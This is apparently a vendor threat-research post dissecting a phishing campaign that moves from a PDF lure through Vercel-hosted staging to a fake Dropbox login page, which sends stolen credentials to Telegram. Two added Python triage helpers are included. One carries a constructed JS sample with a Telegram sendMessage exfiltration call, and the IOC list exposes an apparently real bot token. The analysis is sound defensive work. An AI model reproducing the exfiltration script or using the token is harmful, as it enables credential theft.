Fake Dropbox Phishing Campaign via PDF and Cloud Storage

  • Prashant Kumar

Recently, the X-Labs team detected a phishing campaign that uses a multi-stage approach to evade email and content scanning by combining trusted platforms, a benign-looking file format and layered redirection.

The attack itself begins with a phishing email containing a PDF attachment. The malicious chain relies on seemingly legitimate cloud infrastructure, such as Vercel Blob storage, to host a PDF that ultimately redirects victims to a Dropbox-impersonation page designed to harvest credentials.

Attack Chain Summary: 

📧 Initial Access -> 📄 Lure PDF Attachment -> ☁️ PDF on Trusted Cloud Storage -> 🔐 Fake Dropbox Login Page -> 🎣 Credential Theft -> 📡 C2 / Exfiltration (Telegram) 

Initial Access Through Procurement-Themed Email

The victim receives a professional-sounding business email (See Figure 1 below) that appears to be part of a normal procurement/tender process. The message asks the recipient to review an attached request order and to sign in using their business email credentials. This type of wording is commonly used in tender or procurement fraud, where urgency and legitimacy are deliberately created to encourage quick action.  

Notably, the email body itself contains no malicious links. Instead, this attack relies on a PDF attachment as the primary delivery mechanism. Emails like this are particularly effective because they often pass standard email authentication checks such as SPF, DKIM and DMARC. The minimal and business-like content helps avoid keyword-based detection, making the message look and feel more like a routine operational request. The sender address is likely spoofed or associated with a compromised account. 

Fig. 1 - Phishing email delivery

PDF Attachment Techniques that Evade Link Detection

An analysis of the PDF’s characteristics shows that it uses /FlateDecode-compressed streams and /AcroForm objects. This is noteworthy because AcroForms are commonly abused to embed interactive or clickable elements while minimizing visible content. 

Fig. 2 - Contents of the lure PDF

Trusted Cloud Storage as a Staging Layer

Hovering over the text “View specification online Here:” reveals a clickable element. It embeds a cloud-hosted link, hxxps[://]nte2srryro7jecki[.]public[.]blob[.]vercel-storage[.]com/ProductLists[.]pdf, which directs the victim to a second PDF hosted on legitimate cloud infrastructure (public.blob[.]vercel-storage[.]com), exploiting implicit trust in well-known platforms. Fig. 3 shows the PDF hosted on cloud infrastructure.
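Added example, not code from the original post or from Forcepoint: a minimal Python triage that inflates FlateDecode streams, pulls every /URI target out of a PDF, and flags links whose host sits on the same public cloud storage suffix the lure used. The sample PDF bytes, the tenant name in the link and the STAGING_SUFFIXES list are constructed for this example.

```python
import re
import zlib
from urllib.parse import urlparse

URI_RE = re.compile(rb"/URI\s*\((.*?)(?<!\\)\)", re.S)
STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.S)
# Public cloud storage suffix seen in this campaign; extend for your own environment (assumption)
STAGING_SUFFIXES = (".public.blob.vercel-storage.com",)


def build_sample_pdf() -> bytes:
    """Constructed stand-in for the lure: an AcroForm catalog plus a link annotation
    hidden inside a FlateDecode stream, pointing at a made-up vercel-storage tenant."""
    link = (b"<< /Type /Annot /Subtype /Link /A << /S /URI "
            b"/URI (https://example-tenant.public.blob.vercel-storage.com/ProductLists.pdf) >> >>")
    body = zlib.compress(link)
    return (b"%PDF-1.7\n"
            b"1 0 obj << /Type /Catalog /Pages 2 0 R /AcroForm << /Fields [] >> >> endobj\n"
            b"5 0 obj << /Length " + str(len(body)).encode() + b" /Filter /FlateDecode >>\n"
            b"stream\n" + body + b"\nendstream\nendobj\n"
            b"trailer << /Root 1 0 R >>\n%%EOF\n")


def views(pdf: bytes):
    """Yield the raw bytes, then every stream body that inflates as zlib (FlateDecode)."""
    yield pdf
    for m in STREAM_RE.finditer(pdf):
        try:
            yield zlib.decompress(m.group(1))
        except zlib.error:
            continue  # not a Flate stream (image data, other filters); skip it


def extract_uris(pdf: bytes) -> list[str]:
    found: list[str] = []
    for view in views(pdf):
        for m in URI_RE.finditer(view):
            uri = m.group(1).decode("latin-1")
            if uri not in found:
                found.append(uri)
    return found


def triage_pdf(pdf: bytes) -> dict:
    """Summarise the traits the write-up calls out: AcroForm, Flate streams, embedded links."""
    uris = extract_uris(pdf)
    return {
        "has_acroform": b"/AcroForm" in pdf,
        "has_flate_streams": b"/FlateDecode" in pdf,
        "uris": uris,
        "cloud_staged": [u for u in uris
                         if (urlparse(u).hostname or "").endswith(STAGING_SUFFIXES)],
    }
```

The raw file contains no readable link at all; only after inflating the stream does the vercel-storage URL appear, which is why scanners that only grep the raw bytes miss it.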

Fig. 3 - Staging PDF

Fig. 4 - Social engineering attack

Stolen Credentials Sent to Telegram Infrastructure

The credentials entered by the victim are then captured and transmitted to the attacker, enabling account takeover and potential lateral movement. Looking at the content of the fake page, we observe JavaScript with the following functionality.

Form handling & Validation

It retrieves the email and password input fields (#email, #password) and the login form. Fig. 5 shows the routine.

Fig. 5 - Email & password retrieval routine

It includes validation functions for the email (a basic regex) and the password (a minimum length of 0 characters, which effectively allows any password).

Data Collection

It attempts to extract an email address from the URL query parameters. Upon form submission, it gathers the entered email and password.

From there, it fetches the user's IP address and geo-location details (city, region, country, ISP) using external APIs (https://api64.ipify.org and https://ipapi.co). Figure 6 shows the routine: 

Fig. 6 - Data collection

Data Transmission (Telegram Integration)

To transmit the information, it constructs a message containing the collected form data (email, password) and user/system details (IP, geo-location, date, time, device).

It then sends this data to a Telegram bot using a hardcoded bot token and chat ID. This means that any data entered into the login form is sent to a specific Telegram channel. Figure 7 shows the routine in more detail:

Fig. 7 - Data transmission

Simulated Login Process

After sending data to Telegram, it simulates a login process using a 5-second delay. It has “loginSuccess” hardcoded to false, meaning it always displays an "Invalid email or password" error message after the delay, regardless of the input. See the routine below:

Fig. 8 - Simulated Dropbox login process

Overall, the script is designed to capture user credentials (email and password) along with user system and location information to transmit it to a Telegram bot, while presenting a fake login failure message to the user.
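Added example, not code from the original post or from Forcepoint: a Python triage helper that takes the source of a suspected phishing page and extracts the tells described in the sections above (Telegram bot API use, hardcoded bot token and chat ID, ipify/ipapi lookups, the always-false loginSuccess and the zero-length password check), redacting the token secret so the result can be shared. The SAMPLE_JS snippet, its token and its chat ID are constructed placeholders, not the campaign's script.

```python
import re
from urllib.parse import urlparse

# Constructed sample resembling the page script described above (placeholders only).
SAMPLE_JS = r"""
const emailInput = document.querySelector('#email');
const passwordInput = document.querySelector('#password');
function validatePassword(p) { return p.length >= 0; }   // accepts any password
const botToken = "0000000000:PLACEHOLDER_TOKEN_0123456789ABCDEFG";
const chatId = "-1000000000000";
async function collect() {
  const ip = await fetch('https://api64.ipify.org?format=json').then(r => r.json());
  const geo = await fetch('https://ipapi.co/' + ip.ip + '/json/').then(r => r.json());
  await fetch(`https://api.telegram.org/bot${botToken}/sendMessage`, { method: 'POST' });
  const loginSuccess = false;
  setTimeout(() => { if (!loginSuccess) showError('Invalid email or password'); }, 5000);
}
"""

TOKEN_RE = re.compile(r"\b(\d{8,10}):[A-Za-z0-9_-]{35}\b")   # Telegram bot token shape
CHAT_RE = re.compile(r"chat_?[iI]d\s*[:=]\s*['\"]?(-?\d+)")
URL_RE = re.compile(r"https?://[^\s'\"`<>]+")


def triage_page_script(js: str) -> dict:
    """Return defanged indicators: bot id only (secret part dropped), chat id,
    external lookup hosts, and the behavioural tells the write-up describes."""
    token = TOKEN_RE.search(js)
    chat = CHAT_RE.search(js)
    hosts = {urlparse(u).hostname for u in URL_RE.findall(js)}
    return {
        "telegram_api": "api.telegram.org/bot" in js,
        "bot_id": token.group(1) if token else None,
        "chat_id": chat.group(1) if chat else None,
        "external_lookups": sorted(h for h in hosts if h and h != "api.telegram.org"),
        "always_fails_login": bool(re.search(r"loginSuccess\s*=\s*false", js)),
        "accepts_any_password": bool(re.search(r"length\s*>=\s*0\b", js)),
    }


def redact(js: str) -> str:
    """Strip the bot secret before sharing a captured script with other analysts."""
    return TOKEN_RE.sub(lambda m: m.group(1) + ":<redacted>", js)
```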

Why This Multi-Stage PDF Chain Works

This attack began with an initial access through a routine business email. The email contained a PDF attachment used as a lure, a file type that is widely trusted and commonly exchanged in everyday business.  

Once opened, the PDF did not deliver malware. Instead, it directed the user to a second PDF hosted on a trusted cloud service. This step was critical: by using legitimate cloud infrastructure, the attackers reduced suspicion and bypassed many automated security checks that rely on reputation and known-bad indicators.

The cloud-hosted document then redirects victims to a fake Dropbox login page. Because Dropbox is a familiar and trusted brand, the request for credentials appeared reasonable to the unsuspecting users. It’s here that the campaign moves from deception to impact.

Once the victim enters login details, credentials get harvested. These stolen credentials are then exfiltrated to attacker-controlled command-and-control infrastructure, enabling further misuse such as account takeover, internal access or additional follow-on fraud.

Protection Statement

Forcepoint customers are protected against this threat at the following stages of attack:

  • Lure – Email delivered with a weaponized PDF. It is added to our malicious hash database. Email is blocked.  
  • Dropper – PDF dropper categorized. PDF is added to our malicious hash database.
  • Redirection – URL to fake Dropbox login page categorized.
  • Call Home – C2 categorized.  

IOC

Subject: e-Tender (Operating Unit - Standard P.O requires your acceptance)
Lure PDF (attachment): Name: 2026_PO_I0I_Jan_25_LGXZ.pdf; SHA1: 56ba0c54f9f02c182a46461dc448868fc663901c
Secondary PDF: Name: ProductLists.pdf; SHA1: 88e542b163d1de6dedbbc85b1035a2b2d3b88bb8
Dropper: hxxps[://]nte2srryro7jecki[.]public[.]blob[.]vercel-storage[.]com/ProductLists[.]pdf
Redirected URL: hxxps[://]tovz[.]life/bid-doc2026[.]php/?ai=xd
C2: hxxps[://]api[.]telegram[.]org/bot6141034733:AAH-FLm9XyFjiV6F7jq6UHBXcVZTq7rZbP0/sendMessage
Prashant Kumar

Prashant serves as a Security Researcher for the X-Labs Threat Research Content. He spends his time researching web and email-based cyberattacks with a particular focus on URL research, email security and analyzing malware campaigns.
